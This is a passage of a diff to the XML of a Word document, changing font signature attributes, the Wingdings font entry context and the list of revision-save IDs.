-    <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Wingdings">
     <w:panose1 w:val="05000000000000000000"/>
@@ -2632,9 +4144,9 @@
     <w:rsidRoot w:val="009B63A4"/>
     <w:rsid w:val="00264722"/>
     <w:rsid w:val="004D5A23"/>
-    <w:rsid w:val="00660C98"/>
     <w:rsid w:val="006D2F48"/>
     <w:rsid w:val="009B63A4"/>
+    <w:rsid w:val="00B51ABF"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
